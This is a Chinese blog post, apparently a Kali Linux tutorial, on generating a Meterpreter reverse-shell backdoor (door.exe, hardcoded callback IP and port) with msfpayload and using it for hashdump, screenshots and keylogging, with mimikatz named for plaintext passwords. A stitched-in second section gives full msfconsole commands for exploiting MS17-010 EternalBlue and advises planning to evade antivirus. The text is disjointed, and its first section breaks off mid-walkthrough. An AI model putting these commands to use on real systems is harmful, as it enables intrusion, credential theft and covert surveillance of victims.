kali漏洞利用之Meterpreter介绍

本文介绍了如何在Kali Linux中生成和利用Meterpreter后门。通过设置LHOST和LPORT参数,将door.exe植入目标主机,然后在Kali上开启handler等待连接。成功连接后,可以使用Meterpreter的各种命令,如sysinfo、hashdump、screenshot、keyscan_start等进行系统信息查看、哈希抓取、屏幕截图和键盘记录。此外,还提及了扩展工具mimikatz和wdigest,它们能用于抓取明文密码和凭据。

这里写图片描述
使用示例:

1.生成Meterpreter后门

命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。

msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe

 这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
 

use exploit/multi/handler

用这个exp来接受返回的链接

### 创建 Sessions 的过程 要在 Kali Linux 中通过 Metasploit 利用 MS17-010 永恒之蓝漏洞创建 sessions,以下是具体方法: #### 1. **启动并配置环境** 确保攻击端和目标端的网络连接正常。根据描述,攻击端为 Kali Linux (IP 地址 `192.168.214.128`),而被攻击端为 Windows 7 x64 系统 (IP 地址 `192.168.214.129`)[^2]。 #### 2. **加载 EternalBlue 和 DoublePulsar 模块** 在 Kali Linux 上打开终端,并进入 Metasploit 控制台: ```bash msfconsole ``` 随后,在控制台中执行以下命令来设置模块参数: ```plaintext use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.214.129 set LPORT 4444 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit ``` 上述命令的作用如下: - 加载针对 SMB 协议中的 MS17-010 漏洞的 Exploit 模块。 - 设置远程主机为目标 IP (`RHOSTS=192.168.214.129`)。 - 配置本地监听端口为 `LPORT=4444`。 - 设定有效负载为反向 TCP Meterpreter Shell (`windows/x64/meterpreter/reverse_tcp`),以便成功利用后获得交互式会话[^4]。 #### 3. **验证漏洞是否存在** 运行前可先确认目标机器存在该漏洞。可以通过扫描工具 Nmap 或者直接尝试触发漏洞的方式完成初步判断。如果一切顺利,则会在屏幕上看到类似于“Session created”的提示信息表示已经建立了有效的 session 连接。 #### 4. **管理 Session** 一旦成功建立了一个 meterpreter shell 后就可以对其进行操作了比如浏览文件系统、抓取哈希值等等: ```plaintext sessions -l # 查看当前所有活动session列表 sessions -i X # 与编号X对应的特定session进行互动 ``` ### 注意事项 为了提高成功率,请务必保证目标操作系统未打补丁以及服务处于开启状态;同时考虑到实际环境中可能存在的各种防护措施如杀软等影响因素也需要提前做好规避计划[^1]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值